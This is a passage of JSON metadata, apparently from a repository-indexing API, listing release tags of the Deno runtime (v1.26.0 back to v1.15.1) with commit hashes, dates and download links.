url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts